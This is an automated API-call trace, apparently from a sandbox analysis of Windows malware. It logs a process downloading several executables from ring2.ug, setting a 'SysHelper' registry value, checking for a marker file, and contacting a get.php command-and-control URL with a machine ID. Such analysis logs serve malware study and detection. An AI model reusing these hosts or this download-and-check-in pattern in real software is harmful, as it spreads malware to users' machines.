1 [0109.366] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x18) returned 0x3202c70 [0109.366] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0109.366] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x320eea0 [0109.366] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x85a) returned 0x3217b58 [0109.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x320eea0, cbMultiByte=-1, lpWideCharStr=0x3217b58, cchWideChar=1069 | out: lpWideCharStr="http://ring2.ug/files/cost/updatewin1.exe") returned 42 [0109.366] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x860) returned 0x32183c0 [0109.366] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3217b58 | out: hHeap=0x610000) returned 1 [0109.366] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x320eea0 | out: hHeap=0x610000) returned 1 [0109.373] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x860) returned 0x3217b58 [0109.373] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x82d) returned 0x3218c28 [0109.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring2.ug/files/cost/updatewin1.exe", cchWideChar=-1, lpMultiByteStr=0x3218c28, cbMultiByte=2093, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring2.ug/files/cost/updatewin1.exe", lpUsedDefaultChar=0x0) returned 42 [0109.373] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x830) returned 0x3219460 [0109.373] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3218c28 | out: hHeap=0x610000) returned 1 [0109.373] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3217b58 | out: hHeap=0x610000) returned 1 [0109.373] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://ring2.ug/files/cost/updatewin1.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0112.191] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3219460 | out: hHeap=0x610000) returned 1 [0112.191] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x32183c0 | out: hHeap=0x610000) returned 1 [0112.191] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0112.202] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x320eea0 [0112.202] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x85a) returned 0x3216bb0 [0112.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x320eea0, cbMultiByte=-1, lpWideCharStr=0x3216bb0, cchWideChar=1069 | out: lpWideCharStr="http://ring2.ug/files/cost/updatewin2.exe") returned 42 [0112.202] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x860) returned 0x32183b0 [0112.202] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3216bb0 | out: hHeap=0x610000) returned 1 [0112.202] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x320eea0 | out: hHeap=0x610000) returned 1 [0112.202] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x860) returned 0x3216bb0 [0112.202] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x82d) returned 0x3218c18 [0112.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring2.ug/files/cost/updatewin2.exe", cchWideChar=-1, lpMultiByteStr=0x3218c18, cbMultiByte=2093, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring2.ug/files/cost/updatewin2.exe", lpUsedDefaultChar=0x0) returned 42 [0112.202] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x830) returned 0x3219450 [0112.202] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3218c18 | out: hHeap=0x610000) returned 1 [0112.202] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3216bb0 | out: hHeap=0x610000) returned 1 [0112.202] InternetOpenUrlA (hInternet=0xcc0008, lpszUrl="http://ring2.ug/files/cost/updatewin2.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0116.839] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3219450 | out: hHeap=0x610000) returned 1 [0116.839] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x32183b0 | out: hHeap=0x610000) returned 1 [0116.839] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc000c [0116.839] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x320eea0 [0116.839] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x858) returned 0x3222318 [0116.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x320eea0, cbMultiByte=-1, lpWideCharStr=0x3222318, cchWideChar=1068 | out: lpWideCharStr="http://ring2.ug/files/cost/updatewin.exe") returned 41 [0116.839] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x860) returned 0x3218138 [0116.839] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3222318 | out: hHeap=0x610000) returned 1 [0116.839] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x320eea0 | out: hHeap=0x610000) returned 1 [0116.839] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x860) returned 0x3222318 [0116.839] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x82c) returned 0x3218fe8 [0116.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring2.ug/files/cost/updatewin.exe", cchWideChar=-1, lpMultiByteStr=0x3218fe8, cbMultiByte=2092, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring2.ug/files/cost/updatewin.exe", lpUsedDefaultChar=0x0) returned 41 [0116.839] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x830) returned 0x679438 [0116.839] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3218fe8 | out: hHeap=0x610000) returned 1 [0116.839] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3222318 | out: hHeap=0x610000) returned 1 [0116.839] InternetOpenUrlA (hInternet=0xcc000c, lpszUrl="http://ring2.ug/files/cost/updatewin.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0119.132] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x679438 | out: hHeap=0x610000) returned 1 [0119.132] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3218138 | out: hHeap=0x610000) returned 1 [0119.132] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0119.132] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x320eea0 [0119.132] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x848) returned 0x3222318 [0119.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x320eea0, cbMultiByte=-1, lpWideCharStr=0x3222318, cchWideChar=1060 | out: lpWideCharStr="http://ring2.ug/files/cost/3.exe") returned 33 [0119.132] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x850) returned 0x3218138 [0119.132] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3222318 | out: hHeap=0x610000) returned 1 [0119.132] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x320eea0 | out: hHeap=0x610000) returned 1 [0119.132] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x850) returned 0x3222318 [0119.132] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x824) returned 0x3218fe8 [0119.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring2.ug/files/cost/3.exe", cchWideChar=-1, lpMultiByteStr=0x3218fe8, cbMultiByte=2084, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring2.ug/files/cost/3.exe", lpUsedDefaultChar=0x0) returned 33 [0119.132] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x830) returned 0x3216cc0 [0119.132] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3218fe8 | out: hHeap=0x610000) returned 1 [0119.132] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3222318 | out: hHeap=0x610000) returned 1 [0119.132] InternetOpenUrlA (hInternet=0xcc0010, lpszUrl="http://ring2.ug/files/cost/3.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) Thread: id = 42 os_tid = 0x94c [0109.735] timeGetTime () returned 0x115d0c6 [0109.735] GetLastError () returned 0x54f [0109.735] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x3bc) returned 0x3220f10 [0109.735] GetCurrentThreadId () returned 0x94c [0109.735] SetLastError (dwErrCode=0x54f) [0109.736] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0xfc9a5e4 | out: phkResult=0xfc9a5e4*=0x5d0) returned 0x0 [0109.736] RegQueryValueExW (in: hKey=0x5d0, lpValueName="SysHelper", lpReserved=0x0, lpType=0xfc9a5d8, lpData=0xfc9a5e0, lpcbData=0xfc9a5dc*=0x4 | out: lpType=0xfc9a5d8*=0x0, lpData=0xfc9a5e0*=0x0, lpcbData=0xfc9a5dc*=0x4) returned 0x2 [0109.736] RegSetValueExW (in: hKey=0x5d0, lpValueName="SysHelper", Reserved=0x0, dwType=0x4, lpData=0xfc9a5e0*=0x1, cbData=0x4 | out: lpData=0xfc9a5e0*=0x1) returned 0x0 [0109.736] RegCloseKey (hKey=0x5d0) returned 0x0 [0109.736] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xfc9a4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0109.736] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0109.736] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x18) returned 0x3202dd0 [0109.737] AreFileApisANSI () returned 1 [0109.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfc9a4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0109.737] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x7a) returned 0x66ec38 [0109.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfc9a4e4, cbMultiByte=-1, lpWideCharStr=0x66ec38, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0109.744] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfc9a368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0109.779] GetLastError () returned 0x2 [0109.779] GetLastError () returned 0x2 [0109.779] SetLastError (dwErrCode=0x2) [0109.779] GetLastError () returned 0x2 [0109.779] SetLastError (dwErrCode=0x2) [0109.779] GetLastError () returned 0x2 [0109.779] SetLastError (dwErrCode=0x2) [0109.787] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x66ec38 | out: hHeap=0x610000) returned 1 [0109.787] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0109.787] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x70) returned 0x325d648 [0109.787] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xa6) returned 0x31fe0d8 [0109.788] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x325d648 | out: hHeap=0x610000) returned 1 [0109.788] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x320f060 [0109.788] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x840) returned 0x32212d8 [0109.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x320f060, cbMultiByte=-1, lpWideCharStr=0x32212d8, cchWideChar=1056 | out: lpWideCharStr="490C00C027B159BE46CE14D71389A685") returned 33 [0109.788] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x850) returned 0x3221b20 [0109.788] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x32212d8 | out: hHeap=0x610000) returned 1 [0109.788] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x320f060 | out: hHeap=0x610000) returned 1 [0109.788] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x8c0) returned 0x3215cc0 [0109.788] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x31fe0d8 | out: hHeap=0x610000) returned 1 [0109.788] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3221b20 | out: hHeap=0x610000) returned 1 [0109.788] lstrcpyW (in: lpString1=0xfc9af78, lpString2="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685" [0109.788] lstrcatW (in: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685", lpString2="&first=true" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685&first=true") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685&first=true" [0109.788] InternetOpenUrlW (hInternet=0xcc0010, lpszUrl="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php?pid=490C00C027B159BE46CE14D71389A685&first=true", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0114.547] InternetReadFile (in: hFile=0x0, lpBuffer=0xfc9a778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xfc9a604 | out: lpBuffer=0xfc9a778, lpdwNumberOfBytesRead=0xfc9a604) returned 0 [0114.547] InternetCloseHandle (hInternet=0x0) returned 0 [0114.547] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0114.547] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3215cc0 | out: hHeap=0x610000) returned 1 [0114.547] timeGetTime () returned 0x115e39b [0114.547] timeGetTime () returned 0x115e39b [0114.547] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0114.548] Sleep (dwMilliseconds=0x64) [0114.654] timeGetTime () returned 0x115e408 [0114.654] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0114.654] Sleep (dwMilliseconds=0x64) [0114.763] timeGetTime () returned 0x115e475 [0114.763] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0114.763] Sleep (dwMilliseconds=0x64) [0114.872] timeGetTime () returned 0x115e4e2 [0114.872] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0114.872] Sleep (dwMilliseconds=0x64) [0114.982] timeGetTime () returned 0x115e550 [0114.982] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0114.982] Sleep (dwMilliseconds=0x64) [0115.091] timeGetTime () returned 0x115e5bd [0115.091] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0115.091] Sleep (dwMilliseconds=0x64) [0115.200] timeGetTime () returned 0x115e62a [0115.200] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0115.200] Sleep (dwMilliseconds=0x64) [0115.310] timeGetTime () returned 0x115e697 [0115.310] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0115.310] Sleep (dwMilliseconds=0x64) [0115.419] timeGetTime () returned 0x115e704 [0115.419] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0115.419] Sleep (dwMilliseconds=0x64) [0115.528] timeGetTime () returned 0x115e772 [0115.528] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0115.528] Sleep (dwMilliseconds=0x64) [0115.637] timeGetTime () returned 0x115e7df [0115.637] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0115.637] Sleep (dwMilliseconds=0x64) [0115.746] timeGetTime () returned 0x115e84c [0115.746] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0115.746] Sleep (dwMilliseconds=0x64) [0115.856] timeGetTime () returned 0x115e8b9 [0115.856] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0115.856] Sleep (dwMilliseconds=0x64) [0115.965] timeGetTime () returned 0x115e926 [0115.965] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0115.965] Sleep (dwMilliseconds=0x64) [0116.074] timeGetTime () returned 0x115e994 [0116.074] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0116.075] Sleep (dwMilliseconds=0x64) [0116.183] timeGetTime () returned 0x115ea01 [0116.183] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0116.183] Sleep (dwMilliseconds=0x64) [0116.292] timeGetTime () returned 0x115ea6e [0116.292] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0116.293] Sleep (dwMilliseconds=0x64) [0116.401] timeGetTime () returned 0x115eadb [0116.401] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0116.402] Sleep (dwMilliseconds=0x64) [0116.511] timeGetTime () returned 0x115eb48 [0116.511] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0116.511] Sleep (dwMilliseconds=0x64) [0116.620] timeGetTime () returned 0x115ebb6 [0116.620] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0116.620] Sleep (dwMilliseconds=0x64) [0116.729] timeGetTime () returned 0x115ec23 [0116.729] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0116.729] Sleep (dwMilliseconds=0x64) [0116.838] timeGetTime () returned 0x115ec90 [0116.838] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0116.838] Sleep (dwMilliseconds=0x64) [0116.949] timeGetTime () returned 0x115ecfd [0116.949] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0116.949] Sleep (dwMilliseconds=0x64) [0117.057] timeGetTime () returned 0x115ed6a [0117.057] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0117.057] Sleep (dwMilliseconds=0x64) [0117.166] timeGetTime () returned 0x115edd8 [0117.166] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0117.166] Sleep (dwMilliseconds=0x64) [0117.275] timeGetTime () returned 0x115ee45 [0117.275] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0117.275] Sleep (dwMilliseconds=0x64) [0117.384] timeGetTime () returned 0x115eeb2 [0117.384] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0117.385] Sleep (dwMilliseconds=0x64) [0117.494] timeGetTime () returned 0x115ef1f [0117.494] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0117.494] Sleep (dwMilliseconds=0x64) [0117.604] timeGetTime () returned 0x115ef8c [0117.604] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0117.604] Sleep (dwMilliseconds=0x64) [0117.712] timeGetTime () returned 0x115effa [0117.712] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0117.712] Sleep (dwMilliseconds=0x64) [0117.821] timeGetTime () returned 0x115f067 [0117.821] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0117.839] Sleep (dwMilliseconds=0x64) [0117.948] timeGetTime () returned 0x115f0e4 [0117.948] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0117.948] Sleep (dwMilliseconds=0x64) [0118.055] timeGetTime () returned 0x115f151 [0118.055] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0118.055] Sleep (dwMilliseconds=0x64) [0118.165] timeGetTime () returned 0x115f1be [0118.165] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0118.165] Sleep (dwMilliseconds=0x64) [0118.273] timeGetTime () returned 0x115f22b [0118.274] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0118.274] Sleep (dwMilliseconds=0x64) [0118.382] timeGetTime () returned 0x115f298 [0118.382] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0118.382] Sleep (dwMilliseconds=0x64) [0118.492] timeGetTime () returned 0x115f306 [0118.492] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0118.492] Sleep (dwMilliseconds=0x64) [0118.601] timeGetTime () returned 0x115f373 [0118.601] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0118.601] Sleep (dwMilliseconds=0x64) [0118.710] timeGetTime () returned 0x115f3e0 [0118.710] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0118.710] Sleep (dwMilliseconds=0x64) [0118.851] timeGetTime () returned 0x115f46c [0118.851] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0118.851] Sleep (dwMilliseconds=0x64) [0118.960] timeGetTime () returned 0x115f4da [0118.960] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0118.960] Sleep (dwMilliseconds=0x64) [0119.069] timeGetTime () returned 0x115f547 [0119.069] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0119.069] Sleep (dwMilliseconds=0x64) [0119.185] timeGetTime () returned 0x115f5b4 [0119.185] PeekMessageW (in: lpMsg=0xfc9a5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xfc9a5c8) returned 0 [0119.185] Sleep (dwMilliseconds=0x64) Process: id = "6" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x2d9c7000" os_pid = "0xadc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "created_scheduled_job" parent_id = "5" os_parent_pid = "0x370" cmd_line = "taskeng.exe {DB668368-489B-4327-9A23-11F48A542DE3} 